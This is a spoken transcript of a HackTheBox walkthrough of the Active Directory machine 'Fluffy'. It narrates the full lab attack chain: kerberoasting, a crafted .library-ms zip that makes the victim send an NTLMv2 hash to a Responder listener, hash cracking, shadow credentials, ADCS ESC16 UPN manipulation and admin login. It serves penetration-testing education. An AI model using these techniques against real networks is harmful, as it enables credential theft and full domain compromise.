What's going on YouTube? This is Ipsec. I'm going to be doing Fluffy from HackTheBox, which is an easy assumed breach Active Directory box. Well, easy as long as you keep your tools up to date, as the privesc was AD ESC 16. I know I rattled off a bunch of letters. That's Active Directory Certificate Services Escalation number 16, and that's only available in recent versions of Certipy. And these certificate exploits are very hard to find manually, so if you didn't update Certipy, you were just spinning your wheels for a long time. The box starts off with a set of credentials. You can find a PDF on a file share that indicates it's vulnerable to a recent CVE, which would cause Windows to make an SMB request upon unzipping a specially crafted zip file. So you create that, upload it to a share, get net NTLM v2 credentials, which you can crack and gain access to an account that gives the ability to add itself to a group and can take over a few service accounts. One of these accounts, we can perform ESC number 16 to get root. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it Fluffy, and then the IP address of 10.10.11.69, and I have a typo there, so I'm just going to fix it. This can take some time to run, so I've already ran it. Looking at the results, we can see 10 ports are showing as opened, right? The first one is going to be DNS on port 53. It's simple DNS plus, which is the default banner for Active Directory. And I always just scroll down, look at LDAP, and we see there is a domain fluffy.htb. So I'm going to go ahead and add this to my host file. Also DC01, we have the fully qualified domain name right there. So let's do sudo v etc host. Then we can add 10.10.11.69 fluffy.htb. Let's do dco1.fluffy.htb, and I'm just going to add dco1 as well. The three names that can be applicable to this, right? So let's look at what else we have here. Let's see. Kerberos, the LDAP. It's showing that we do have a certificate authority on this box. So we may want to run like Certipy, things like that, to just look at certificate configuration. I'll probably do that later on, because if we did all the recon possible for every single box, everything would take a while, right? But normally when I see that, I normally run Certipy and just see what certificates are there, what type of enrollment rights, things like that, right? Let's see. We have LDAP. Again, this is going to be LDAP-S. The main thing I'm looking for right now is like some type of web server or something like that. We can see the box is 7 hours different from us. So if we do anything Kerberos related, we probably should sync our time, right? Let's see. More LDAP. Again, just kind of skipping over that. The clock skew in this host script results. So nothing really there, right? So this is a assumed breach box. So we start off with a set of credentials. So I'm going to add this to a creds.txt just so I have them and don't have to keep going back to the page. So let's do creds.txt, put this in, and we will add this password. Okay. So to start off, I always like just using netexec. So I'll do netexec smb. Let's do dco1 fluffy htb. I don't know why I keep saying fluffly, but there we go. J. Fleshman and P. I think that's still on my clipboard, right? And since it has a special character, I'm just going to put that in single quotes. And what I want to make sure now is we just have the credentials correct, right? And that we can access the box. There we go. It took a little bit, but we do have a successful authentication, right? So one of the things I like doing is just testing for Kerberos right off the bat. So we can say LDAP and then say a -- kerberoasting output.txt. And then we can also run Rusthound. I like doing Rusthound over, what is it? Like the Bloodhound Python collector, because it collects a lot more things, specifically certificate data. So I just like using Rusthound, right? Let's do domain, fluffy. I typed that again. -u j.fleshman. Hopefully I did that correct. And put that password in. And this has errored because we have a clock skew. So let's do sudo ntp date and then fluffy.htb. That should set my time correctly. Run this again. And let's see, LDAP result. I wonder if that was also time related. We probably just typoed the username. So let's do cat creds.txt. Let's go ahead and grab this. And we can paste this in. There we go. So Rusthound is working. We do have some kerberoast creds. So if I cat output.txt where it's saved, we have a few, like writable service. Let's see what else we have. Going up, LDAP service, and CA service. So we have the certificate service, LDAP, and writable. So I'm going to just SEP this over to the Kraken. And this is just a box on my network where I run Hashcat out of. You can do it on your local host. I just wouldn't recommend doing it in a VM because VMs would like slow down the hash cracking process. Let's see. Let's go into Hashcat. I'll copy it into hashes and I'll call this fluffy.krb, I guess. That seems fine. CD hashcat. And let's do /hashcat. I cannot type today. Put that there. And then opt word list rocku.txt. And let's see if we start cracking anything. We need to specify the hashcat mode. This is going to be a Kerberos 5. So I'm just going to do -m 13100. Let that go. And we do have a bunch of files from Bloodhound. So let's go cd opt bloodhound server docker compose up-d to start the service. And none of these hashes cracked. So it bought us nothing. We do have Bloodhound running now. So I'm going to do localhost 8088 because that's where I have Bloodhound configured to run. The default is 8080, but Burp Suite likes listening on that port. So I always change my Bloodhound to be 8088 just so those two don't conflict, right? So I'm going to now go and ingest data. So we can go administration, upload files. Let's go to IPsec, HTB, Fluffy, and copy all of these. I could have added like the -z for zip and then just had one big zip. That's probably the easier way to do it, but I did not. So it is ingesting. A video I would recommend if you wanted to run Certipy early would be Certipy JQ, I guess, if you go to ipsec.rocks. And I'd go to watch this video, right? Because the user we have isn't going to be vulnerable. So the exploit doesn't really stick out in the Certipy results. This video, we talk about using JQ to just show odd configurations of certificate data. I think specifically we're looking for any user that has enrollment rights that is non-default, right? So I would go look at this video, study up on that if you want to run Certipy when you first get a user account, and you can examine certificate information that way very easily. It says it is partially complete. So let's go down to Explore. And then I'm just going to search for the user I have, which is that J Fleshman. And let's see, we can click. And I like looking at member of. We are users, domain users, so no interesting groups. Outbound object control. We can see what data we have. We can enroll certificates. If we did the Certipy command in vulnerable, we don't really find anything. We could mark our user as owned and then go over to a cipher query. And there's probably going to be like a shortest path from owned. Shortest path from, let's see, owned objects to the tier 0. I think if we run either of these, nothing really happens. I think that's actually erroring, which is odd. There we go. Let's see what this shows. I'm a member of domain users, which is a member of users. So this gives us nothing. One thing we did not do is look at the, what is it? Let's go back to NXC, the file shares, right? So I can change this back to SMB. And if I do a -- shares, we can see if we have access to any of the file shares. We could also use like SMB client for this as well. I think it's -u j.flei like this. And then what is it? Fluffy HTB. I want to say it's a -L. Do we do it on this side? Maybe user is a U. Like this. Wow, there we go. So we can paste this password in, and this will show near the same thing, right? We see admin, $, IPC, IT. I like using crackmap exec because it tells us the permissions, right? We have read write over the IT directory. So if I get rid of this and just do IT, we should be able to access it. And it's worth noting, if this was a file server, not a domain controller, this authentication would fail because I'm authenticating as work group. The domain controller has no real concept of a domain, oddly enough, like local accounts work for it. So that's why this is working. But if it wasn't the domain controller itself hosting it, I would have to specify the domain, right? So I think if I do fluffy HTTP, and yeah, that should work. Do I have the password? Do not have the password. Let's now put this in, copy, paste. So this is the better way to access it, right? So now if I just take this -L off, we could access the file share. If I do a dir, we can see we have everything, key pass, upgrade notice. So I'm just going to get the PDF, and then let's just open this PDF. Upgrade notice. Did I not save it there? Where is my directory? Oh, I'm in Bloodhound server. Opt Bloodhound server, upgrade notice, copy it here. And now I can just open this. So looking at it, we have multiple high impact vulnerabilities have been publicly disclosed. So if we start scrolling down, we can see which vulnerabilities they're talking about. They don't really give any details. So we could go and just go to like CVE details and then search each one like this and try to figure out what it is. But I don't think this page actually tells you like if exploits are available or things like that. So what I honestly do is just Google like GitHub POC for the CVEs first to see if I can find a quick exploit on GitHub, right? And this isn't finding anything, or did this? Oh, this is just a Vaughn feed. I'm just gonna go over to Google. I don't like DuckDuckGo for some reason. I think the search results aren't as good as Google for some reason. And that's actually doing the same thing. But my eyes are used to seeing this page much more. And I do a search, nothing's highlighted. So I don't think this CVE has anything interesting. If we do this one, let's change out the CVE, put this in. And I expected like my browser to highlight things. I guess it didn't. We do have an MSF Venom payload for this. So there are various POCs. I don't see the one I'm used to seeing. Let's see. This is also a good one. So this is going to be a Metasploit thing. I don't like this page because it's not telling me like a good blog post that has a lot of information, but it's pretty easy to figure it out based upon the description. But this one has this blog from cti.monster. It's an odd domain, but it's a really good blog post about it, right? Essentially, if we have a zip file and we put a specially crafted .libary-ms inside of that, when Windows unzips it, it's going to hit this URL. And because Windows likes doing automatic logins, if we point this at our box, then Windows will automatically attempt to log in with the user that is logged in as, right? And that's how we get a NTLM v2 hash and we can crack it, right? This is mainly going to be a vector that you have to be on the same network or at least the same company network, because when Windows sees a SMB path from a non-local address, so that's one that's not like 192.168, 172.16.10, 10.10, like, or that's something that's actually 10.0.0. So if it's not one of those RFC 19 addresses that are local, it's not going to automatically attempt to log in, at least to my knowledge. So this would not work if we just crafted a zip file, had something listening on the internet. We couldn't just steal hashes, right? You have to be on the same local network. That's not the same broadcast domain, which would be like 192.168.1 dot something in this example. It's just the same network that's also a local address. Hopefully that makes sense, but I can't copy and paste this screenshot. So I'm going to use the GitHub POC because it makes it easy. But essentially all you're doing is creating a zip file, right? We can look at this poc.py and we see it's starting to create that XML. We have IP address here, and it's just going to compress a zip file for us, right? So let's go ahead and clone this. So I'm going to do a, let's just do a new window, git clone on this. Go into this CVE directory, python3 poc.py. Enter my file name. I'm going to call it malware.zip. Obviously, you wouldn't do that, but my IP address is 10.10.14.8. And now all we have to do is set up responder. So let's do sudo responder-i ton0. And I think that's all we have to do, right? We have a SMB server on. So I don't think we have to specify any other options. I hope. So do I have a SMB window open? I don't. We can, but let's go cd htb fluffy before I do that. SMB client. Let's copy this password. Capital J, paste. There we go. dir. And I'm going to put malware.zip and see if anyone clicks it. I probably have it in that CVE directory. So let's copy that. ls CVE, POC, 7ZL. I wonder if it just... Okay, so it's malware.zip.libary-ms. So that's the file name. That's fine. So move this here, put exploit.zip. So we have now put it in, and we just want to wait to see if anyone makes a connection to us, right? If I do sslntp grep 445, we can see I am listening on ton 0, which is 10.10.14.8 on 445. So hopefully someone will make a connection within, I'm going to give it 2 minutes. So I can do sleep 120. And then I'm just going to take a look at this to make sure nothing happens. We do have an email address, so maybe we have to use something like swax and email the user, but I didn't see any like SMTP in my nmap report. So I don't think it's going to be that type of thing. So I'm going to pause the video and we'll resume when the sleep is finished. Literally the second I clicked stop recording, we did get a hit. So we have the NTLM v2 hash right here. So I'm going to go ahead and grab this. Then we can say sh kraken cd hashcat v hashes. We called it fluffy dot. We'll do NTLM v2. Paste this in. /hashcat. The hash opt word list rocku.txt. And we'll see if this ends up cracking, right? And while that starts, I'm going to copy this username. We can close this PDF out. We can go back to Bloodhound and pull up this user, because if we get the user, what does this give us access to? That's my main question. So we can start this. I'm just going to go ahead, mark as owned, and if we don't crack it, then I'll probably unmark it. But let's see. We're a member of 3 groups. So if I look at this, we're a member of service account managers. So that is what's different currently. If I look at outbound object control, we can see I'm a member of domain users. We saw that before with the last user. But we can see service account managers has generic all over service accounts. So that means we can add ourselves to this group. So I'm just going to go ahead and also mark this group as owned. And then let's see what we can do with this group. So if I click on it, then I'm going to go to outbound object control. And we have generic right over 3 groups, CA, LDAP, and WinRM. Since we have generic right, this is going to allow us to update the password for these accounts. So I'm going to use a shadow password, I think is what it's called. It's essentially configuring certificate login for these accounts. So that's going to enable me to gain access to the account without updating the password. So there's a less chance at breaking services, right? Whenever you can use the shadow one, I'd highly recommend it, because if you just update the password, if anyone goes to use it, then it breaks, right? Like if they're using this LDAP service account and applications, and they're using that as like the bind so the application can authenticate against the Active Directory, you change that password, you're creating a huge outage. So that's why I'm going to avoid that. Looking at Hashcat, we have recovered 1 out of 1. I'm just going to delete this word list, and we'll do a -- show, and we'll get this password, right? P.AGILA, and that's Prometheus X303. So let's go ahead, stop a responder. I'm going to do v-creds.text. We can say p.agila, put this password in. And then I'm just going to do nxc smb fluffy.htb p.agila p like this. Just make sure the credential works. Give it a second. I don't know why this is taking its time, but we do have the credential. So let's go ahead and take over these accounts. You don't need the WinRM. This is going to be where user.txt is. So that's the one I'm going to start out with. But the main step is going to be the CA service. So we're going to take over both of these accounts. So the first step is we have to add ourselves to that group, right? Let's do pathfinding. I'll copy this, start node, that, and then end node is going to be WinRM. And this will really easily put this path in a visible format, right? So we're a member of this. Let's go ahead and make it so it's a bit easier for you to see. So I think if I do this, that'll let me zoom and we can see the entire path, right? There we go. So we're going to, since we're a member of this, we're going to add ourselves to the service account group, and that's going to allow us generic write over WinRM service. And essentially, that's how we get the shadow credential. So the first step is to add ourselves to the service accounts. And I'm going to use BloodyAD to do that. BloodyAD. And we can say -u, p, agila, -p. We don't have that password in my clipboard anymore, do we? Nope. So let's go ahead and copy this. Paste. And then what do we need next? The domain, fluffy HTTP. The host is going to be 10.10.11.69. I don't know if I need that. I'm just in a habit of supplying it. And I type this domain differently. Man, I just cannot type that. So I'm going to do add group member, service accounts, and then the user we want to add, which will be ourself, P.AGILA, and we have a typo somewhere. I'm guessing add group member has a casing. Yeah, the M is capital. I really hate that about BloodyAD. The commands are case sensitive. So now we have added ourselves to that group, which means we'll be able to use Certipy to create the shadow credential. So Certipy shadow p.agila fluffy HTTP password Prometheus X. We'll do account WinRM SVC DC IP 10.10.11.69. Let's see, we missed something. What did I miss? Typo. And typo. Did I say I'm having problems typing today? So we have that. I'm going to go ahead and just copy this command because it does take a second for that to work. And while that does, I'm going to request something for the CA service as well. So we'll have both of these. This is going to give us the TGT hash for these accounts, right? So we have the NTLM hash here, v creds.text. We'll do WinRM SVC, paste that in, CA SVC, and we will paste this in. Okay, save. And then we could just do like evil win rm -I 10 10 11 69 user win rm svc. I want to say it's a dash capital H, right? Is that hash? There we go. So this is how you could get user.txt. I think that's in desktop like that. So that would be that. But the next step is abusing the certificate account, right? So if we just looked at CA SVC, do this, and then we'll do kind of the same thing. Look at our outbound object control, see what this account can do. We have generic write over to users. We can enroll in those certificates. And we can also enroll in the CA. But nothing really stands out here. And Bloodhound currently doesn't show the ADCS, I think it's ESC 16. I think it's the 16 attack. Bloodhound doesn't currently show it, so that's why we don't have it in this interface. And at the time of release, you had to grab a version of Certipy from like 1 or 2 weeks in order for it to show up in Certipy. So this was a relatively new attack when the box released. But if I do Certipy now, we can do Certipy find dash, what is it? Username, CA, SVC, hashes. Do I have this hash? I think this is the right. No, that's the WinRM because I just logged in. Let's go ahead and grab this hash. There we go. So we have the hash. We want to specify the CA, which is fluffy DC01 CA. So we can say fluffy DC01 CA. I think I typed that right. That looks good. And then after this, what do we need? DC IP 10 10 11 69 dash vulnerable. Actually, I don't specify the CA here because it's going to look at everything. Can I though? No. I think that's all I need. There we go. So it's connecting remote registry, and once this finishes, it should highlight the vulnerable certificates. I think Certipy now by default just puts it into an output file, so we'll just be able to read that and then see what we have. Web enrollment. I don't know if that's probably because the web server is not online. So we have written to Certipy. So let's go and cat this 203. And we'll do .text. Here we go. So we have ESC 16 because the security extension is disabled. This is going to be very similar to the certified video, which was ESC 9. The difference between ESC 16 and ESC 9 is ESC 16 is configured on the certificate authority itself. So all certificates are vulnerable. ESC 9 is on the template itself. And because our account is a member of certificate publishers, that's what's going to enable this, right? If we ran Certipy from any other account, it wouldn't show as vulnerable because that account is not a member of certificate publishers. We could also be a member of administrators enterprise admin, but if we were, then we won't have to use this exploit. But essentially, ESC 9 and 16 allows the security extension. It's a weak mapping in Active Directory. And by that, I mean, it's going to trust the user principal name in order to map an account. I want to say the strong mapping requires the SID of that user, the like S dash, that long unique name. It's just a more secure place to put it, right? So we'll show this in a minute. Let's see if I can quickly find a blog post for you to read. It's probably going to be the Certipy wiki. So I would highly recommend just reading these if you want more information, but we'll go ahead and exploit it and hopefully it makes sense as we go through it, right? So let's go ahead and do this. So what we have to do first is update the user principal name for an account, right? And we could do that from the P.AGILA account, right? Because this is the one that had the generic write, right? So if I went to path finding, is this still here? Let's do P.AGILA. Do this. Generic write, come on. Right. Because we have write access over these accounts, we can update the user principal name. So I'm going to update the user principal name for the CA service to be administrator. And then we're going to request a certificate. In that certificate, it's going to say the subject alternate name is administrator. Then when we use that certificate, it's going to map to the administrator user and let us in as them. So that is the attack in a nutshell. So if it doesn't make sense after watching the video, I'd highly recommend going to the certified video because I also do the very similar attack there. So what I'm first going to do is, let's see, let's do a Certipy account P.AGILA, the password, let's do cat creds, this. Put this in DCIP 10.10.11.69. We'll do -user CA service read. So we can see what the current user principal name is. It is going to be CA service at fluffy.htb. It's also worth noting, if we were doing it to an account that wasn't a domain administrator, we couldn't have the domain here, right? Windows will treat both CA service and CA service at fluffy.htb as the same thing. If we try to update it to a UPN that already exists, we'd get a violation constraint, right? So if you ever do this attack, you get a violation constraint, I would just change it to be either the fully qualified name, adding the domain to it, or taking the domain off of it. So let's see. We can say the account, and we'll do -UPN. I'll show you the constraint real quick. So if we do win service, what is it? WinRM SVC. I think that's the account that already exists. Let's do update. This should allow it. We have to add ourselves to the group because hygiene, like a script automatically cleaned up the box. So let's do, what is it? BloodyAD -u P.AGILA. Do I have that password? I do. -account. No. Prometheus domain. Fluffy HTTP host 10.10.11.69. Add group member service accounts P.AGILA. What? Typoed. There we go. So now when I do this, it's going to succeed, right? Because the UPN for this was the fully qualified name. If I tried to update this to be fluffy.htb, this is going to be where it errors. We have a constraint error because that is a unique field. So if you ever see that, I just swap out between the two. But we're going to change our UPN to be administrator. Administrator. Okay. So now that we do this, now we want to request a certificate. So we can do certipy request -u, and we're going to do it as the CA service user. Hashes. Let's go ahead and grab this hash. And then -CA. This is the fluffy DC01CA. The template. I want to say that was the user template. The UPN is going to be administrator. DCIP 10.10.11.69. UPN. So this is going to request a certificate. And we're going to get the UPN of administrator because that's what we set our UPN to for this user. And if I want to, we could use OpenSSL, PKCS12 in administrator. You don't have to do this. What I'm going to do is just show what the certificate looks like. Do no keys because I don't care about the private keys. That puts it in the X509 format, which lets us dump things. No out, this is going to hide some base64 output, and text will make it readable. So if I look at this certificate and we look at the subject alternate name, it is administrator. So this is going to be what our certificate uses to authenticate. And if we attempted to authenticate right now, it would fail, because if we look at our CA service, the UPN is currently administrator, and we attempt to use a certificate, it would map to this user and fail. We can show that real quick, as long as like the cleanup script doesn't fix what we just did. So we'll do, what is it? Certipy auth DC IP 10.10.11.69. The file administrator PFX. The username is administrator, and the domain is fluffy HTTP. There we go. So this fails. Now what I'm going to do is that update command again, and we're going to, let's see, Certipy, was it BloodyAD I used? There we go. So this UPN can be anything we want. I'm just going to put it back to CA service. And now, because the certificate for the CA service account, or this UPN doesn't match that UPN, it's going to default to the domain admin, and that's what's going to let us in, right? So hopefully that makes sense, right? The certificate says we're UPN of administrator. Currently, the CA service account had that UPN, so it mapped to that. The domain administrator also had that UPN, but it just went to the CA service first. Once we killed that confliction, now the certificate just let us in as administrator. Hopefully that makes sense. I don't know an easy way to explain that. But let's go evil winrm -i administrator -i the IP address -u administrator -p capital H for hash. Do this, and this is going to let us in as administrator, which then we can go to desktop and read the flag. So that's going to be the video. Hope it all made sense and you enjoyed it. Take care, and I will see you all next time.